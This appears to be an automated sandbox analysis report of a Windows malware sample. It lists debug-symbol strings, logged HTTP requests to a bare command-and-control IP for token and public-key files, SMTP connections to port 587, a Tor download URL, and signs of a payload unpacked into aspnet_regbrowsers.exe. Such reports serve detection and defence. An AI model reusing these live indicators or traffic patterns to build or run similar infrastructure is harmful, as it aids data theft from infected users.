                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp
                      Source: Binary string: diasymreader.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: psapi.pdb; source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: winhttp.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.ni.pdb% source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: rtutils.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.pdbx source: WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp
                      Source: Binary string: D .pdb source: W7UbgU8x18.exe, 00000000.00000002.301641662.00000000005A8000.00000004.00000001.sdmp, W7UbgU8x18.exe, 00000000.00000000.260367500.00000000005A8000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000000A.00000003.271728501.0000000003125000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.270300201.0000000003125000.00000004.00000001.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000A.00000003.285168837.00000000054D0000.00000004.00000040.sdmp
                      Source: Binary string: WLDP.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 0000000A.00000003.285031636.0000000005501000.00000004.00000001.sdmp
                      Source: Binary string: System.ni.pdbRSDS source: WER343.tmp.dmp.10.dr
                      Source: Binary string: clrjit.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.Xml.pdb0 source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: rasman.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: Microsoft.VisualBasic.pdb0 source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: wmswsock.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: version.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: wintrust.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.pdbMZ source: WER343.tmp.dmp.10.dr
                      Source: Binary string: System.Xml.pdb source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: System.pdb source: W7UbgU8x18.exe, 00000000.00000000.256471113.00000000028DD000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.284964542.00000000054D1000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: ore.ni.pdb source: WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp
                      Source: Binary string: tuneraidfix.pdb<qA source: WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp
                      Source: Binary string: fixedhost.pdb source: W7UbgU8x18.exe, 00000000.00000000.261864579.0000000002860000.00000004.00020000.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: System.Core.pdbq source: WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\tuneraidfix.pdb] source: W7UbgU8x18.exe, 00000000.00000002.302413121.0000000000BAE000.00000004.00000020.sdmp, W7UbgU8x18.exe, 00000000.00000000.255992862.0000000000BAE000.00000004.00000020.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000A.00000003.285168837.00000000054D0000.00000004.00000040.sdmp
                      Source: Binary string: psapi.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: W7UbgU8x18.exe, 00000000.00000002.302413121.0000000000BAE000.00000004.00000020.sdmp, W7UbgU8x18.exe, 00000000.00000000.255992862.0000000000BAE000.00000004.00000020.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.pdbx source: WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000A.00000003.271474632.0000000003137000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.270327702.0000000003137000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.270696517.0000000003137000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.271114110.0000000003137000.00000004.00000001.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: mscoreei.pdb source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdbk source: WerFault.exe, 0000000A.00000003.285188895.00000000054D7000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284978604.00000000054D7000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285080721.00000000054D7000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.pdb source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: System.Xml.ni.pdb0 source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: Zsymbols\exe\tuneraidfix.pdb source: W7UbgU8x18.exe, 00000000.00000002.301641662.00000000005A8000.00000004.00000001.sdmp, W7UbgU8x18.exe, 00000000.00000000.260367500.00000000005A8000.00000004.00000001.sdmp
                      Source: Binary string: l8C:\Windows\tuneraidfix.pdb source: W7UbgU8x18.exe, 00000000.00000002.301641662.00000000005A8000.00000004.00000001.sdmp, W7UbgU8x18.exe, 00000000.00000000.260367500.00000000005A8000.00000004.00000001.sdmp
                      Source: Binary string: bcryptprimitives.pdbk source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.pdbi source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.Xml.ni.pdb" source: WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp
                      Source: Binary string: System.ni.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284964542.00000000054D1000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: cryptbase.pdbk source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: crypt32.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Joe Sandbox ViewASN Name: 24SHELLSUS 24SHELLSUS
                      Source: global trafficHTTP traffic detected: GET /token_ta992i.txt HTTP/1.1Host: 194.85.248.219Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /publickey.txt HTTP/1.1Host: 194.85.248.219
                      Source: global trafficHTTP traffic detected: GET /token_ta992i.txt HTTP/1.1Host: 194.85.248.219
                      Source: global trafficHTTP traffic detected: GET /publickey.txt HTTP/1.1Host: 194.85.248.219
                      Source: Joe Sandbox ViewIP Address: 209.205.200.74 209.205.200.74
                      Source: global trafficTCP traffic: 192.168.2.5:49817 -> 209.205.200.74:587
                      Source: global trafficTCP traffic: 192.168.2.5:49817 -> 209.205.200.74:587
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.219
                      Source: aspnet_regbrowsers.exe, 00000002.00000002.518302726.0000000003231000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: W7UbgU8x18.exe, 00000000.00000002.303285101.0000000002881000.00000004.00000001.sdmpString found in binary or memory: http://194.85.248.219
                      Source: W7UbgU8x18.exe, 00000000.00000002.303457973.00000000028B2000.00000004.00000001.sdmpString found in binary or memory: http://194.85.248.219/publickey.txt
                      Source: W7UbgU8x18.exe, 00000000.00000000.256041961.0000000000BF9000.00000004.00000020.sdmp, W7UbgU8x18.exe, 00000000.00000002.303285101.0000000002881000.00000004.00000001.sdmpString found in binary or memory: http://194.85.248.219/token_ta992i.txt
                      Source: aspnet_regbrowsers.exe, 00000002.00000002.518302726.0000000003231000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: aspnet_regbrowsers.exe, 00000002.00000002.520908081.0000000006CC0000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca
                      Source: aspnet_regbrowsers.exe, 00000002.00000002.519514145.000000000358E000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.516444584.00000000013E1000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                      Source: aspnet_regbrowsers.exe, 00000002.00000002.516444584.00000000013E1000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                      Source: aspnet_regbrowsers.exe, 00000002.00000002.519514145.000000000358E000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.516444584.00000000013E1000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                      Source: aspnet_regbrowsers.exe, 00000002.00000002.519514145.000000000358E000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.520908081.0000000006CC0000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.516444584.00000000013E1000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/cPanelIncCertificationAuthority.crl0
                      Source: WerFault.exe, 0000000A.00000002.300722840.0000000004F20000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: aspnet_regbrowsers.exe, 00000002.00000002.519418805.000000000354A000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000002.00000003.465831512.00000000011A4000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.519494646.0000000003588000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.518302726.0000000003231000.00000004.00000001.sdmpString found in binary or memory: http://m3kI8gc4jNB3oWFQtMC.org
                      Source: aspnet_regbrowsers.exe, 00000002.00000002.519514145.000000000358E000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.516444584.00000000013E1000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: aspnet_regbrowsers.exe, 00000002.00000002.519514145.000000000358E000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.520908081.0000000006CC0000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.516444584.00000000013E1000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com01
                      Source: aspnet_regbrowsers.exe, 00000002.00000002.519514145.000000000358E000.00000004.00000001.sdmpString found in binary or memory: http://odin.mk-host.com
                      Source: aspnet_regbrowsers.exe, 00000002.00000002.518302726.0000000003231000.00000004.00000001.sdmpString found in binary or memory: http://sGexjS.com
                      Source: WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
                      Source: WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
                      Source: WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
                      Source: WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
                      Source: WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
                      Source: WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
                      Source: WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
                      Source: W7UbgU8x18.exe, 00000000.00000002.303285101.0000000002881000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
                      Source: WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
                      Source: WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
                      Source: WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
                      Source: WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
                      Source: WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
                      Source: WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o
                      Source: Amcache.hve.10.drString found in binary or memory: http://upx.sf.net
                      Source: aspnet_regbrowsers.exe, 00000002.00000002.519514145.000000000358E000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.520908081.0000000006CC0000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.516444584.00000000013E1000.00000004.00000020.sdmpString found in binary or memory: https://sectigo.com/CPS0
                      Source: W7UbgU8x18.exe, 00000000.00000002.307259101.00000000038AA000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000002.00000000.249733386.0000000000402000.00000040.00000001.sdmp, aspnet_regbrowsers.exe, 00000002.00000000.249428029.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: aspnet_regbrowsers.exe, 00000002.00000002.518302726.0000000003231000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                      Source: unknownDNS traffic detected: queries for: odin.mk-host.com
                      Source: global trafficHTTP traffic detected: GET /token_ta992i.txt HTTP/1.1Host: 194.85.248.219Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /publickey.txt HTTP/1.1Host: 194.85.248.219
                      Source: global trafficHTTP traffic detected: GET /token_ta992i.txt HTTP/1.1Host: 194.85.248.219
                      Source: global trafficHTTP traffic detected: GET /publickey.txt HTTP/1.1Host: 194.85.248.219
                      Source: W7UbgU8x18.exe, 00000000.00000000.261051389.0000000000B7A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      System Summary:

                      barindex
                      .NET source code contains very large array initializationsShow sources
                      Source: 2.0.aspnet_regbrowsers.exe.400000.3.unpack, u003cPrivateImplementationDetailsu003eu007b51F4FAD8u002dC68Cu002d48D5u002d8048u002dB546FD1BA033u007d/BD7250DBu002dF98Du002d47A7u002d866Cu002d6BD9A3781D1C.csLarge array initialization: .cctor: array initializer size 11957
                      Source: 2.0.aspnet_regbrowsers.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b51F4FAD8u002dC68Cu002d48D5u002d8048u002dB546FD1BA033u007d/BD7250DBu002dF98Du002d47A7u002d866Cu002d6BD9A3781D1C.csLarge array initialization: .cctor: array initializer size 11957
                      Source: 2.0.aspnet_regbrowsers.exe.400000.1.unpack, u003cPrivateImplementationDetailsu003eu007b51F4FAD8u002dC68Cu002d48D5u002d8048u002dB546FD1BA033u007d/BD7250DBu002dF98Du002d47A7u002d866Cu002d6BD9A3781D1C.csLarge array initialization: .cctor: array initializer size 11957
                      Source: 2.0.aspnet_regbrowsers.exe.400000.2.unpack, u003cPrivateImplementationDetailsu003eu007b51F4FAD8u002dC68Cu002d48D5u002d8048u002dB546FD1BA033u007d/BD7250DBu002dF98Du002d47A7u002d866Cu002d6BD9A3781D1C.csLarge array initialization: .cctor: array initializer size 11957
                      Source: 2.2.aspnet_regbrowsers.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b51F4FAD8u002dC68Cu002d48D5u002d8048u002dB546FD1BA033u007d/BD7250DBu002dF98Du002d47A7u002d866Cu002d6BD9A3781D1C.csLarge array initialization: .cctor: array initializer size 11957
                      Source: 2.0.aspnet_regbrowsers.exe.400000.4.unpack, u003cPrivateImplementationDetailsu003eu007b51F4FAD8u002dC68Cu002d48D5u002d8048u002dB546FD1BA033u007d/BD7250DBu002dF98Du002d47A7u002d866Cu002d6BD9A3781D1C.csLarge array initialization: .cctor: array initializer size 11957
